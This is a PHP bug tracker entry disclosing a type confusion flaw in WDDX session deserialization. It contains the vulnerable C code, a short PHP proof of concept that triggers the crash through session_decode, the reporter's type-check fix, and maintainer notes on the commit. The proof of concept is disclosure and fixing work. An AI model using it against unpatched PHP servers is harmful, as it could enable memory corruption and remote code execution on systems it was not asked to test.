php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #70741 Session WDDX Packet Deserialization Type Confusion Vulnerability
Submitted: 2015-10-19 14:36 UTC Modified: 2016-01-06 03:19 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: WDDX related
PHP Version: Irrelevant OS: *
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2015-10-19 14:36 UTC] taoguangchen at icloud dot com 
Description:
------------
Session WDDX Packet Deserialization Type Confusion Vulnerability

```
PS_SERIALIZER_DECODE_FUNC(wddx)
{
	...
	
	MAKE_STD_ZVAL(retval);

	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {

		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
			 zend_hash_get_current_data(Z_ARRVAL_P(retval), (void **) &ent) == SUCCESS;
			 zend_hash_move_forward(Z_ARRVAL_P(retval))) {
			 hash_type = zend_hash_get_current_key_ex(Z_ARRVAL_P(retval), &key, &key_length, &idx, 0, NULL);
```

an attacker can deserialize a string-type ZVAL via php_wddx_deserialize_ex(). this means the attacker is able to create fake HashTable via the Z_ARRVAL_P macro with the string-type ZVAL. this should result in arbitrary remote code execution.

PoC:
```
<?php

ini_set('session.serialize_handler', 'wddx');
session_start();

$hashtable = str_repeat('A', 66);
$wddx = "<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
	<data>
		<string>$hashtable</string>
	</data>
</wddxPacket>";
session_decode($wddx);

?>
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-10-19 14:48 UTC] taoguangchen at icloud dot com 
fix:
```
	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {
		
+		if (Z_TYPE_P(retval) != IS_ARRAY) {
+			return FAILURE;
+		}
		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
```
 [2015-12-28 20:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2015-12-28 20:45 UTC] stas@php.net 
In security repo as 1785d2b805f64eaaacf98c14c9e13107bf085ab1
 [2015-12-28 20:46 UTC] stas@php.net 
Also please see: https://gist.github.com/smalyshev/20c9459a434c1597d46d
 [2016-01-06 03:19 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-01-06 03:19 UTC] stas@php.net 
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2016-01-06 03:38 UTC] stas@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-01-06 06:34 UTC] ab@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-01-06 06:34 UTC] ab@php.net 
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=1785d2b805f64eaaacf98c14c9e13107bf085ab1
Log: Fixed bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability
 [2016-02-02 10:53 UTC] korvin1986 at gmail dot com 
Hello, 
is any CVE-ID exists for this vulnerability.
Or have I request it at http://www.cve.mitre.org ?
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Tue Dec 03 17:01:29 2024 UTC